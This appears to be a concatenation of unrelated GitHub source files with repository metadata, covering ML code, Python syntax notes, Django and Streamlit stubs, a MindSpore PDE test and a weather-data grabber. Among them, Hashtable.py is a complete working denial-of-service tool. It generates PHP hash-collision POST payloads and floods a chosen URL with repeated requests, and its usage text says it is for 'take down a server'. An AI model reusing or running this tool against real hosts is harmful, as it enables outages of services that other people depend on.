hidden_size=self.cfg.context_size,
num_layers=self.n_layers,
dropout=self.dropout_p,
)
self.out = nn.Linear(self.cfg.context_size, self.cfg.vocab_size)
def forward(self, word_idx_slice, last_hidden_state):
""" Processes a single slice of the minibatch - a single word per row """
embedded_words = self.embedding(word_idx_slice) \
.view(1, self.cfg.batch_size, self.cfg.embed_size)
post_dropout_words = self.dropout(embedded_words)
output, hidden_state = self.rnn(post_dropout_words, last_hidden_state)
word_dist = F.log_softmax(self.out(output.squeeze(0)))
return word_dist, hidden_state
|
[
"stuart@axelbrooke.com"
] |
stuart@axelbrooke.com
|
0a7dc15098a11e2585324fc2d0969841cf17bb22
|
f77b2c4b5808c360e8644644b0b3dba401ed3682
|
/random_games/python_syntax.py
|
1c3841b39cc9283bd72db28c63247c12c7a8bb21
|
[] |
no_license
|
616049195/random_junks
|
6a29393b7fcdb9b8968ff252446380effd629216
|
c616a29b1a0025f3451870ed660e28b81126e97e
|
refs/heads/master
| 2021-01-16T21:00:47.286799
| 2013-11-23T23:42:22
| 2013-11-23T23:42:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,645
|
py
|
"""
Python syntax...
"""
# list comprehension
## syntax
new_list = [x for x in range(1,6)]
# => [1, 2, 3, 4, 5]
##
## examples
even_squares = [x**2 for x in range(1,11) if (x)%2 == 0]
##
# dictionary
my_dict = {
'name' : "Hyunchel",
'age' : 23,
'citizenship' : "Republic of Korea"
}
print my_dict.keys()
print my_dict.values()
for key in my_dict:
print key, my_dict[key]
#
# list slicing
## syntax
[start:end:stride]
same with range() syntax.
[inclusive: exclusive: inclusive]
# if you omit, you can default value [first:last:1]
# negative values change direction (reverse...)
##
l = [i ** 2 for i in range(1, 11)]
# Should be [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
print l[0:9:2]
## omitting
my_list = range(1, 11) # List of numbers 1 - 10
# Add your code below!
print my_list[::2]
##
## reverseing
my_list = range(1, 11)
# Add your code below!
backwards = my_list[::-1]
print backwards
##
# lambda
## syntax
# lambda variable: expression
##
squares = [x**2 for x in range(1, 11)]
print filter(lambda x: x >= 30 and x <= 70, squares)
#
## file i/o
#----__enter__() and __exit__() invocation "with" and "as" syntax
#syntax
with open("file", "mode") as variable:
# Read or write to the file
#
#### "variable" is created for good. it can be used after the statement. ###
#examples
with open("text.txt", "w") as textfile:
textfile.write("Success!")
#
#_---- File's memeber variable "closed" is set to True/False depending the file's open status
with open("text.txt", "r+") as my_file:
my_file.write("HONEY")
if not my_file.closed:
my_file.close()
print my_file.closed
#
##
|
[
"hyunchelkk@gmail.com"
] |
hyunchelkk@gmail.com
|
6cf0811024e03797d865654b2f6c18918e1db095
|
31948daa03278629f577fe9f6dcc19b6480604e7
|
/Hashtable.py
|
1c05fe90bb777f22d4b21f63c636581d14b938f1
|
[
"Unlicense"
] |
permissive
|
SpyEyeFamily/DarkSouL_ReaCt0r
|
4019d607630457ebb8bd0215dafcd39daee4d772
|
8cde5e03b2120237a345a92b20208efb287b6591
|
refs/heads/master
| 2020-12-28T20:20:18.755049
| 2016-09-17T23:17:46
| 2016-09-17T23:17:46
| 68,482,914
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,617
|
py
|
#! /usr/bin/env python
###########################
# Copyrights Please #
###########################
###########################
# My Original Code #
###########################
# WhoAmi :
#https://www.facebook.com/Gods.nd.kings
#https://www.facebook.com/clayteamwhoami
"""
Examples:
-) Make a single Request, wait for the response and save the response to output0.html
python Hashtable.py -u https://host/index.php -v -c 1 -w -o output -t PHP
-) Take down a server(make 500 requests without waiting for a response):
python Hashtable.py -u https://host/index.php -v -c 500 -t PHP
Changelog:
v5.0: Define max payload size as parameter
v4.0: Get PHP Collision Chars on the fly
v3.0: Load Payload from file
v2.0: Added Support for https, switched to HTTP 1.1
v1.0: Initial Release
"""
#############################
# LIBRARIES #
#############################
import socket
import sys, os
import sys
import math
import urllib
import string
import time
import urlparse
import argparse
import ssl
import random
import itertools
####################
# Main #
####################
def main():
parser = argparse.ArgumentParser(description="| Take down a remote PHP Host |"
"| Coder Name : WhoAmi |"
"| Team Name : CLAY TeaM |"
,prog="PHP Hashtable Exploit3r v1.0")
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB", default=8, type=int)
parser.add_argument("--version", action="version", version="%(prog)s 5.0")
#############################
# FUNCTIONS #
#############################
options = parser.parse_args()
url = urlparse.urlparse(options.url)
if not url.scheme:
print("Please provide a scheme to the URL(http://, https://,..")
sys.exit(1)
host = url.hostname
path = url.path
port = url.port
if not port:
if url.scheme == "https":
port = 443
elif url.scheme == "http":
port = 80
else:
print("Unsupported Protocol %s" % url.scheme)
sys.exit(1)
if not path:
path = "/"
if not options.payload:
print("Generating Payload...")
if options.target == "PHP":
payload = generatePHPPayload()
elif options.target == "ASP":
#payload = generateASPPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
elif options.target == "JAVA":
#payload = generateJAVAPayload()
print("Target %s not yet implemented" % options.target)
sys.exit(1)
else:
print("Target %s not yet implemented" % options.target)
sys.exit(1)
print("Payload generated")
if options.save:
f = open(options.save, "w")
f.write(payload)
f.close()
print("Payload saved to %s" % options.save)
else:
f = open(options.payload, "r")
payload = f.read()
f.close()
print("Loaded Payload from %s" % options.payload)
# trim to maximum payload size (in MB)
maxinmb = options.maxpayloadsize*1024*1024
payload = payload[:maxinmb]
print("Host: %s" % host)
print("Port: %s" % str(port))
print("path: %s" % path)
print
print
for i in range(options.count):
print("sending Request #%s..." % str(i+1))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if url.scheme == "https":
ssl_sock = ssl.wrap_socket(sock)
ssl_sock.connect((host, port))
ssl_sock.settimeout(None)
else:
sock.connect((host, port))
sock.settimeout(None)
request = "POST %s HTTP/1.1\r\n\
Host: %s\r\n\
Content-Type: application/x-www-form-urlencoded\r\n\
Connection: Close\r\n\
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
Content-Length: %s\r\n\
\r\n\
%s\r\n\
\r\n" % (path, host, str(len(payload)), payload)
if url.scheme == "https":
ssl_sock.send(request)
else:
sock.send(request)
if options.verbose:
if len(request) > 400:
print(request[:400]+"....")
else:
print(request)
print("")
if options.wait or options.output:
start = time.time()
if url.scheme == "https":
data = ssl_sock.recv(1024)
string = ""
while len(data):
string = string + data
data = ssl_sock.recv(1024)
else:
data = sock.recv(1024)
string = ""
while len(data):
string = string + data
data = sock.recv(1024)
elapsed = (time.time() - start)
print("Request %s finished" % str(i+1))
print("Request %s duration: %s" % (str(i+1), elapsed))
split = string.partition("\r\n\r\n")
header = split[0]
content = split[2]
if options.verbose:
# only print http header
print("")
print(header)
print("")
if options.output:
f = open(options.output+str(i)+".html", "w")
f.write("<!-- "+header+" -->\r\n"+content)
f.close()
if url.scheme == "https":
ssl_sock.close()
sock.close()
else:
sock.close()
def generateASPPayload():
return "a=a"
def generateJAVAPayload():
return "b=b"
def generatePHPPayload():
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
# compute entries with collisions in PHP hashtable hash function
a = computePHPCollisionChars(5)
return _generatePayload(a, 8);
def _generatePayload(collisionchars, payloadlength):
# Taken from:
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
# how long should the payload be
length = payloadlength
size = len(collisionchars)
post = ""
maxvaluefloat = math.pow(size,length)
maxvalueint = int(math.floor(maxvaluefloat))
for i in range (maxvalueint):
inputstring = _base_convert(i, size)
result = inputstring.rjust(length, "0")
for item in collisionchars:
result = result.replace(str(item), collisionchars[item])
post += "" + urllib.quote(result) + "=&"
return post;
def _base_convert(num, base):
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet = fullalphabet[:base]
if (num == 0):
return alphabet[0]
arr = []
base = len(alphabet)
while num:
rem = num % base
num = num // base
arr.append(alphabet[rem])
arr.reverse()
return "".join(arr)
def computePHPCollisionChars(count):
hashes = {}
counter = 0
length = 2
a = ""
for i in range(1, 254):
a = a+chr(i)
source = list(itertools.product(a, repeat=length))
basestr = ''.join(random.choice(source))
basehash = _DJBX33A(basestr)
print("\tValue: %s\tHash: %s" % (basestr, basehash))
hashes[str(counter)] = basestr
counter = counter + 1
for item in source:
tempstr = ''.join(item)
if tempstr == basestr:
continue
temphash = _DJBX33A(tempstr)
if temphash == basehash:
print("\tValue: %s\tHash: %s" % (tempstr, temphash))
hashes[str(counter)] = tempstr
counter = counter + 1
if counter >= count:
break;
if counter != count:
print("Not enough values found. Please start the script again")
sys.exit(1)
return hashes
def _DJBX(inputstring, base, start):
counter = len(inputstring) - 1
result = start
for item in inputstring:
result = result + (math.pow(base, counter) * ord(item))
counter = counter - 1
return int(round(result))
#PHP
def _DJBX33A(inputstring):
return _DJBX(inputstring, 33, 5381)
#ASP
def _DJBX33X(inputstring):
counter = len(inputstring) - 1
result = 5381
for item in inputstring:
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
counter = counter - 1
return int(round(result))
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
SpyEyeFamily.noreply@github.com
|
43fcc04dae20aad1bf6fb21779872c8b34188828
|
bf59fae2a9513c008bab786ea277ff88fe3b335c
|
/Nemisa_mvp/nemisa_app.py
|
43ac793ceefaf0125f2655be72ab8ed312a9f357
|
[] |
no_license
|
Simangele101/Nemisa_hack_2021
|
316320c493b67850da4ff2c9295ad51480d9c887
|
f56c3a51398090cc33008fde3314fdb130bd62b9
|
refs/heads/master
| 2023-04-22T19:53:30.902634
| 2021-04-16T16:20:20
| 2021-04-16T16:20:20
| 358,657,229
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
"""
Simple Streamlit webserver application for serving developed classification
models.
Author: Rogue byte Analytica.
Note:
---------------------------------------------------------------------
Plase follow the instructions provided within the README.md file
located within this directory for guidance on how to use this script
correctly.
---------------------------------------------------------------------
For further help with the Streamlit framework, see:
https://docs.streamlit.io/en/latest/
"""
#import Dependencies
import streamlit as st
import datetime
import pandas as pd
def main():
st.header('Hello Nemisa Hackathon')
st.write("<h3 align='center'>This is Rogue Byte Analytica</h3>",unsafe_allow_html=True)
if __name__ == '__main__':
main()
|
[
"68602378+Simangele101@users.noreply.github.com"
] |
68602378+Simangele101@users.noreply.github.com
|
52dad76367c862489da289aed0ad49fd4d6a600d
|
b04279709d7133e310cca957f85d9bed259cfbdf
|
/application/settings/develop.py
|
30811838eae0cccaadbe9f5b7702cc17ecb69d46
|
[] |
no_license
|
fujimisakari/otherbu
|
7230de39670815d6d72be13aa293f08a128f13d0
|
d70a0c21858e5d37a3cf3fca81b69ea7f73af661
|
refs/heads/master
| 2022-12-10T17:27:15.411751
| 2019-01-02T18:02:46
| 2019-01-02T18:02:46
| 8,172,410
| 0
| 0
| null | 2022-12-08T00:54:53
| 2013-02-13T03:20:05
|
Python
|
UTF-8
|
Python
| false
| false
| 76
|
py
|
from .base import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
AUTO_LOGIN = DEBUG
|
[
"fujimisakari@gmail.com"
] |
fujimisakari@gmail.com
|
8b5bdf81def59b8f6930c4ce22ec1874049a0005
|
8d91f8867fb5b72ca257d9e7152188914154ccd1
|
/pune/controllers/admin/user.py
|
4c97fbd2cff00fce7bec04ce0a205ce7b77a0945
|
[] |
no_license
|
liwushuo/pune
|
c6420e9a3f65711cc7a6c578720122e5b7f53eb9
|
23eae59fc3d3515903700740fade1bce8b8d6e12
|
refs/heads/master
| 2021-01-10T08:10:41.056344
| 2016-04-18T08:45:01
| 2016-04-18T08:45:01
| 53,919,940
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 331
|
py
|
# -*- coding: utf-8 -*-
from flask import render_template
from flask import request
from flask import redirect
from flask import url_for
from flask import abort
from flask import flash
from flask import current_app
from pune.service import UserService
from . import bp
@bp.route('/usrs')
def list_users():
return 'nothing'
|
[
"maplevalley8@gmail.com"
] |
maplevalley8@gmail.com
|
f76e193dc89f82660d667f368bb4936852252bc2
|
29e8e04876b8cf03dd8755ad1d085a755d3f4061
|
/venv/bin/chardetect
|
f3f63f7830033730f7309d96f51b19c34c7b028a
|
[
"MIT"
] |
permissive
|
haideraltahan/CropMe
|
431d213f2163c08579415bf3fc7708366ccd2d78
|
75a111b9d3b2c50c6f2a9a36d21432053f02284d
|
refs/heads/master
| 2020-05-30T07:37:18.713374
| 2019-05-31T20:15:19
| 2019-05-31T20:15:19
| 189,601,563
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
#!/home/haider/Desktop/CropMe/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"haideraltahan@gmail.com"
] |
haideraltahan@gmail.com
|
|
56c0e641146ff1f1664bf1b038aae0946cb7f434
|
6dc12a6426b18e1266639f023cc8d356055aed71
|
/Treadmillwebsite/apps.py
|
f2c9786e1c7982839f5423a66e2f67ec567feaf2
|
[] |
no_license
|
kiranM235/Treadmill-Website-Django
|
6d4e040bed03bfdca06e6fc4c0207dad92c071c2
|
35bb2eb6c19a0b5006f334a761ddfa7c14b4d345
|
refs/heads/master
| 2023-07-06T16:15:27.272961
| 2021-08-17T07:24:20
| 2021-08-17T07:24:20
| 395,590,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.apps import AppConfig
class TreadmillwebsiteConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'Treadmillwebsite'
|
[
"kiranmaharjan89@gmail.com"
] |
kiranmaharjan89@gmail.com
|
66c87d7d3d6df618eec5985290c9a5d2ba36eb39
|
dfaa090887158b35fc19b7274593d78f44658399
|
/Django/mysite9/mysite9/wsgi.py
|
d39d3ab985c3049db075b08a7e9ef7f117e2bb29
|
[] |
no_license
|
Artak2033/Homeworks
|
429c3f5896b6eea52bc6dc7161916afce5d6bd91
|
dbb526ac6ae082b58e58f6204b2106b9ccaf7f58
|
refs/heads/main
| 2023-05-15T14:39:41.992105
| 2021-06-11T12:40:36
| 2021-06-11T12:40:36
| 365,962,275
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for mysite9 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite9.settings')
application = get_wsgi_application()
|
[
"akfartak@mail.ru"
] |
akfartak@mail.ru
|
a1b9c909d2e60fb563ed2c58c3bf28e228f2e771
|
751691a21ed1d8c69c35f3cd9b9fd395dc5c1aa8
|
/{{cookiecutter.项目名称}}/{{cookiecutter.初始化app名称}}/custom_viewset.py
|
10b0164eb8f5f4fa01443e26d36608d2830e48cc
|
[] |
no_license
|
mtianyan/cookiecutter-drf-mtianyan
|
5899847f46e853a0ec5be9bcbf9e7294ce2b70cd
|
b1298f6c5b20149db4589ce127b2e6e0392552b6
|
refs/heads/master
| 2022-12-28T18:26:57.969693
| 2020-10-10T08:29:08
| 2020-10-10T08:29:08
| 275,175,974
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,619
|
py
|
from rest_framework import viewsets, status
from rest_framework.response import Response
from utils import change_key
class CustomViewSet(viewsets.ModelViewSet):
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer = self.get_serializer(instance)
res = serializer.data
if "status" in res.keys():
res["status"] = str(res["status"])
return Response({
"code": 200,
"data": res
})
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response({'code': 200}, status=status.HTTP_201_CREATED, headers=headers)
def put(self, request, *args, **kwargs):
change_key(request)
update_fields = [one for one in request.data.keys() if one != self.serializer_class.Meta.model._meta.pk.name]
self.serializer_class.Meta.model(**request.data).save(update_fields=update_fields)
return Response({'code': 200, 'msg': '修改成功'})
# def destroy(self, request, *args, **kwargs):
# instance = self.get_object()
# self.perform_destroy(instance)
# return Response({'code': 200}, status=status.HTTP_200_OK)
def destroy(self, request, *args, **kwargs):
ids = kwargs["pk"].split(",")
self.serializer_class.Meta.model.objects.filter(pk__in=ids).delete()
return Response({
"code": 200
})
|
[
"1147727180@qq.com"
] |
1147727180@qq.com
|
21f188524361b8fa84956085533990c2bc3dbde9
|
dcc25b784213b17015d2080a7623c772d474dc22
|
/reproduce/AlphaFold2-Chinese/tests/st/mindelec/networks/test_frequency_domain_maxwell/test_frequency_domain_maxwell.py
|
65c3d50f3c3832682e1414cb4e3413c5f6f49489
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
mindspore-ai/community
|
930c9d9fdbead852e3597d522a72fe5b66bfc005
|
c72ce898482419117550ad16d93b38298f4306a1
|
refs/heads/master
| 2023-07-19T19:43:20.785198
| 2023-07-17T06:51:22
| 2023-07-17T06:51:22
| 250,693,100
| 193
| 10
|
Apache-2.0
| 2022-10-29T10:01:40
| 2020-03-28T02:00:02
|
Python
|
UTF-8
|
Python
| false
| false
| 5,395
|
py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
train
"""
import os
import pytest
import numpy as np
import mindspore.nn as nn
import mindspore.ops as ops
from mindspore import context, ms_function
from mindspore.common import set_seed
from mindspore.train.callback import LossMonitor
from mindspore.train.loss_scale_manager import DynamicLossScaleManager
from mindelec.solver import Solver, Problem
from mindelec.geometry import Rectangle, create_config_from_edict
from mindelec.common import L2
from mindelec.data import Dataset
from mindelec.operators import SecondOrderGrad as Hessian
from mindelec.loss import Constraints
from src.config import rectangle_sampling_config, helmholtz_2d_config
from src.model import FFNN
from src.dataset import test_data_prepare
from src.callback import PredictCallback, TimeMonitor
set_seed(0)
np.random.seed(0)
print("pid:", os.getpid())
context.set_context(mode=context.GRAPH_MODE, save_graphs=False, device_target="Ascend")
# define problem
class Helmholtz2D(Problem):
"""2D Helmholtz equation"""
def __init__(self, domain_name, bc_name, net, wavenumber=2):
super(Helmholtz2D, self).__init__()
self.domain_name = domain_name
self.bc_name = bc_name
self.type = "Equation"
self.wave_number = wavenumber
self.grad_xx = Hessian(net, input_idx1=0, input_idx2=0, output_idx=0)
self.grad_yy = Hessian(net, input_idx1=1, input_idx2=1, output_idx=0)
self.reshape = ops.Reshape()
@ms_function
def governing_equation(self, *output, **kwargs):
"""governing equation"""
u = output[0]
x = kwargs[self.domain_name][:, 0]
y = kwargs[self.domain_name][:, 1]
x = self.reshape(x, (-1, 1))
y = self.reshape(y, (-1, 1))
u_xx = self.grad_xx(kwargs[self.domain_name])
u_yy = self.grad_yy(kwargs[self.domain_name])
return u_xx + u_yy + self.wave_number**2 * u
@ms_function
def boundary_condition(self, *output, **kwargs):
"""boundary condition"""
u = output[0]
x = kwargs[self.bc_name][:, 0]
y = kwargs[self.bc_name][:, 1]
x = self.reshape(x, (-1, 1))
y = self.reshape(y, (-1, 1))
test_label = ops.sin(self.wave_number * x)
return 100 * (u - test_label)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_frequency_domain_maxwell():
"""train process"""
net = FFNN(input_dim=2, output_dim=1, hidden_layer=64)
# define geometry
geom_name = "rectangle"
rect_space = Rectangle(geom_name,
coord_min=helmholtz_2d_config["coord_min"],
coord_max=helmholtz_2d_config["coord_max"],
sampling_config=create_config_from_edict(rectangle_sampling_config))
geom_dict = {rect_space: ["domain", "BC"]}
# create dataset for train and test
train_dataset = Dataset(geom_dict)
train_data = train_dataset.create_dataset(batch_size=helmholtz_2d_config.get("batch_size", 128),
shuffle=True, drop_remainder=False)
test_input, test_label = test_data_prepare(helmholtz_2d_config)
# define problem and constraints
train_prob_dict = {geom_name: Helmholtz2D(domain_name=geom_name + "_domain_points",
bc_name=geom_name + "_BC_points",
net=net,
wavenumber=helmholtz_2d_config.get("wavenumber", 2)),
}
train_constraints = Constraints(train_dataset, train_prob_dict)
# optimizer
optim = nn.Adam(net.trainable_params(), learning_rate=helmholtz_2d_config.get("lr", 1e-4))
# solver
solver = Solver(net,
optimizer=optim,
mode="PINNs",
train_constraints=train_constraints,
test_constraints=None,
amp_level="O2",
metrics={'l2': L2(), 'distance': nn.MAE()},
loss_scale_manager=DynamicLossScaleManager()
)
# train
time_cb = TimeMonitor()
loss_cb = PredictCallback(model=net, predict_interval=10, input_data=test_input, label=test_label)
solver.train(epoch=helmholtz_2d_config.get("epochs", 10),
train_dataset=train_data,
callbacks=[time_cb, LossMonitor(), loss_cb])
per_step_time = time_cb.get_step_time()
l2_error = loss_cb.get_l2_error()
print(f'l2 error: {l2_error:.10f}')
print(f'per step time: {per_step_time:.10f}')
assert l2_error <= 0.05
assert per_step_time <= 10.0
|
[
"deanyuton@gmail.com"
] |
deanyuton@gmail.com
|
410f36205d34f73079693b4e026012216b438744
|
459f88ba61bb0200e9906c7ce3c814bdf01bd278
|
/py.py
|
4080d3abf50fdf5ef84cf5c058bddfcf10ff3ffd
|
[] |
no_license
|
iamanx17/Advance-python
|
3c65104997c748c11ff2e322a8665423ca335b34
|
f04baa817667d4d7f628abbefe712f1ea99a3f57
|
refs/heads/main
| 2023-07-07T21:05:38.981879
| 2021-08-12T13:34:33
| 2021-08-12T13:34:33
| 327,520,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
print('Updating this file from vscode!!')
print('Experiment code 4550')
print('Doing one more change')
print('Lets see what will happen')
|
[
"32339572+iamanx17@users.noreply.github.com"
] |
32339572+iamanx17@users.noreply.github.com
|
e452bc13a03434c9d222f4461d20512f8a37aa01
|
12418bfcf8e9508375e041ab97f00b88edbf22a4
|
/datagrabber.py
|
4c491c5e864afb9078b3767677e5d5b475cf4a95
|
[] |
no_license
|
dsmaugy/GOES-Weather-ML
|
74a06291a67372ac2967983b59d7511a07ba7746
|
e94a9965a6593551bc11e8ede8828b290168f02b
|
refs/heads/master
| 2020-04-18T01:03:51.165608
| 2019-06-19T04:27:26
| 2019-06-19T04:27:26
| 167,103,995
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,122
|
py
|
import csv
from os import listdir
from os.path import isfile, join
from datetime import timedelta, datetime
from netCDF4 import Dataset
import time
import timezonefinder
import pytz
import dateutil.parser
import numpy as np
import gcstools
import pickle
NO_DOWNLOAD_MODE = False
DATE_PICKLE_NAME = "datagrabberdate.pickle"
PICKLE_MODE = False
VERBOSE_PRINT_MODE = True
class CsvDataGrabber:
# initialize a data grabber object
# state is the file name
def __init__(self, state, starting_date=(2017, 8, 1, 1)):
self.__state = state
self.__CSV_PATH = "WeatherData/" + str(state)
self.__file_is_active = False
self.__csv_reader = csv.DictReader # placeholder value, probably very unsafe
self.__current_date = starting_date
self.__timezone_dict = {}
def __read_csv(self, csv_reader, input_year, input_month, input_day, input_hour):
start_time = time.time()
tf = timezonefinder.TimezoneFinder()
for row in csv_reader:
lat = float(row["LATITUDE"])
lng = float(row["LONGITUDE"])
# append lat + long coords to dictionary with timezone to save processing time
if (lat, lng) in self.__timezone_dict:
timezone_str = self.__timezone_dict[(lat, lng)]
else:
timezone_str = tf.timezone_at(lat=lat, lng=lng)
self.__timezone_dict[(lat, lng)] = timezone_str
timezone = pytz.timezone(timezone_str)
row_date = dateutil.parser.parse(row["DATE"])
# row_date = datetime.strptime(row["DATE"], "%Y-%m-%d %H:%M")
# make the datetime object aware with timezone
row_date = timezone.localize(row_date)
# remove effects of DST
if row_date.dst().seconds > 0:
updated_row_date = row_date + timedelta(seconds=row_date.dst().seconds)
else:
updated_row_date = row_date # dumb utctimetuple doesn't update if we just replace row_date
year = updated_row_date.utctimetuple().tm_year
month = updated_row_date.utctimetuple().tm_mon
day = updated_row_date.utctimetuple().tm_mday
hour = updated_row_date.utctimetuple().tm_hour
minute = updated_row_date.utctimetuple().tm_min
if year == input_year:
if month == input_month:
if day == input_day:
if hour == input_hour and minute == 0:
if len(row["HOURLYSKYCONDITIONS"]) > 0 and len(row["HOURLYDRYBULBTEMPF"]) > 0 and str.isnumeric(row["HOURLYDRYBULBTEMPF"]):
yield row
elif hour + 1 == input_hour:
if minute > 50:
if len(row["HOURLYSKYCONDITIONS"]) > 0 and len(row["HOURLYDRYBULBTEMPF"]) > 0 and str.isnumeric(row["HOURLYDRYBULBTEMPF"]):
yield row
elif hour >= input_hour:
break
# same as the code block above but special case when we looking at hour == 0
elif day + 1 == input_day:
if input_hour == 0:
if hour == 23:
if minute > 50:
if len(row["HOURLYSKYCONDITIONS"]) > 0 and len(row["HOURLYDRYBULBTEMPF"]) > 0 and str.isnumeric(row["HOURLYDRYBULBTEMPF"]):
yield row
end_time = time.time()
if VERBOSE_PRINT_MODE:
print("Time Elapsed:", end_time - start_time)
print("Found Entries:")
def __initialize_csv(self):
csv_file = open(self.__CSV_PATH)
return csv.DictReader(csv_file, delimiter=",")
def close_file(self):
self.csv_file.close()
def find_row_by_time(self, input_year, input_month, input_day, input_hour):
if VERBOSE_PRINT_MODE:
print("Finding Entry in: %s for %s" % (self.__state, self.__current_date))
if not self.__file_is_active:
self.__csv_reader = self.__initialize_csv()
self.__file_is_active = True
# find the rows for each date in this specified state
matching_rows = []
for row in self.__read_csv(self.__csv_reader, input_year, input_month, input_day, input_hour):
matching_rows.append(row)
# remove any duplicate data from the same station within the 10 minute grace period
if len(matching_rows) > 5:
indexes_to_pop = [] # stores the list of indexes that we can remove
for i in range(0, len(matching_rows) - 1):
name_to_check = matching_rows[i]["STATION"]
# loop over the sublist from name_to_check to see if any dupes are found
for j in range(i + 1, len(matching_rows)):
if matching_rows[j]["STATION"] == name_to_check: # this means that the station has recorded another data entry within the 10 minute grace period
date_to_check = dateutil.parser.parse(matching_rows[i]["DATE"])
date_examined = dateutil.parser.parse(matching_rows[j]["DATE"])
if date_to_check.time() < date_examined.time(): # examined time is closer to the hour, get rid of station[i]
if i not in indexes_to_pop:
indexes_to_pop.append(i)
else:
if j not in indexes_to_pop:
indexes_to_pop.append(j)
# get rid of the duplicates
for pop_index in sorted(indexes_to_pop, reverse=True):
# if pop_index < len(matching_rows): # bruh
matching_rows.pop(pop_index)
if VERBOSE_PRINT_MODE:
for sanitized_row in matching_rows:
print(sanitized_row["STATION_NAME"], sanitized_row["DATE"])
return matching_rows
def find_row_by_set_time(self):
return self.find_row_by_time(*self.__current_date)
def update_time(self, new_date):
self.__current_date = new_date
class RadianceDataGrabber:
def __init__(self, time_to_grab):
self.time = time_to_grab
def find_rad_by_set_time(self, channel):
if not NO_DOWNLOAD_MODE:
try:
ncs_file_id = gcstools.get_objectId_at(self.time, product="ABI-L1b-RadC", channel=channel)
rad_file = gcstools.copy_fromgcs(gcstools.GOES_PUBLIC_BUCKET, ncs_file_id, "SatFiles/SatFile-" + channel)
if VERBOSE_PRINT_MODE:
print("Downloaded", rad_file)
except:
return None
else:
return rad_file
else:
rad_file = "SatFiles/SatFile-" + channel
if VERBOSE_PRINT_MODE:
print("Found", rad_file)
return rad_file
class DataManager:
def __init__(self, starting_date, channels=("C01", "C02", "C03", "C04", "C05", "C06", "C07", "C08", "C09", "C10", "C11", "C12", "C13", "C14", "C15", "C16")):
self.__csv_states = []
self.__current_date = datetime(year=starting_date[0], month=starting_date[1], day=starting_date[2], hour=starting_date[3])
self.__channels = channels
print("No Download Mode is:", NO_DOWNLOAD_MODE)
self.__load_all_states()
def __load_all_states(self):
files = [f for f in listdir("WeatherData/") if isfile(join("WeatherData/", f))]
for state in files:
self.__csv_states.append(CsvDataGrabber(state))
return self.__csv_states
# returns unpadded arrays
def get_formatted_data(self):
# these lists hold our respective radiance and weather data for this time iteration
radiance_feature_input = []
weather_label_output = []
# get all the radiance channels we're going to be using
rad_retriever = RadianceDataGrabber(self.__current_date)
channel_files = []
for channel in self.__channels:
rad_file = rad_retriever.find_rad_by_set_time(channel)
# skip this if the file is missing
if rad_file == None:
return None, None
channel_files.append(rad_file)
# loops through every STATE in the same TIME
for s in self.__csv_states:
# update the time to check in all of the CsvDataGrabbers
s.update_time((self.__current_date.year, self.__current_date.month, self.__current_date.day, self.__current_date.hour))
station_entries = s.find_row_by_set_time()
